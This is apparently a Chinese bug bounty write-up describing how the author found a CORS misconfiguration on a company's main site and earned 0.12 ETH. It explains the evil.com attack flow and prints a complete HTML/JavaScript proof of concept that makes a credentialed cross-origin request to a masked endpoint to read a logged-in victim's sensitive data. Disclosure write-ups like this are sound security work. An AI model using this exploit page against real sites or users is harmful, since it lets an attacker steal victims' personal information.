护网的时候闲的没事干,我这条咸鱼也开始挖某财大气粗的src
懒得找什么子域名,小程序app,先看主站,xray被动一开,就报有cors漏洞,这种漏洞想要有危害,就是要找一个敏感接口并且此接口正好有cors配置不当
举例
假设用户登陆一个含有CORS配置网站foo.com,同时又访问了攻击者提供的一个链接evil.com。
2.evil.com的网站向foo.com这个网站发起请求获取敏感数据,浏览器能否接收信息取决于foo.com的配置。
3.如果foo.com配置了Access-Control-Allow-Origin头且为预期,那么允许接收,反之浏览器会因为同源策略而不接收。
登陆后,因为不同的cookie,可以只看到自己的个人信息,敏感信息等,当攻击者用这个接口,生成cors的漏洞exp后,引诱登陆状态下的受害者点击此exp,则攻击者就可以任意浏览受害者的敏感信息
测了一下,发现全站都有cors,那现在的任务就是找到一处能获得敏感信息的接口,翻bp历史,终于找到一处
可见此处,有cors配置不当,而且返回敏感信息
构造exp:a.html,放到自己的服务器中
然后,在网站浏览器登陆的状态下访问该页面http://xxxx/a.html
模拟攻击者给受害者发送该页面,从而获取受害者的信息
漏洞利用代码:
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "https://xxxxx/xxx/xxx/xxxxx?platform=web", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
该src评价
0.12eth币,我四月份卖的,当时eth价格是一万九,卖了大概2200,成功捡漏
后话:全卖了过了十天,eth涨到两万七。。。微笑.jpg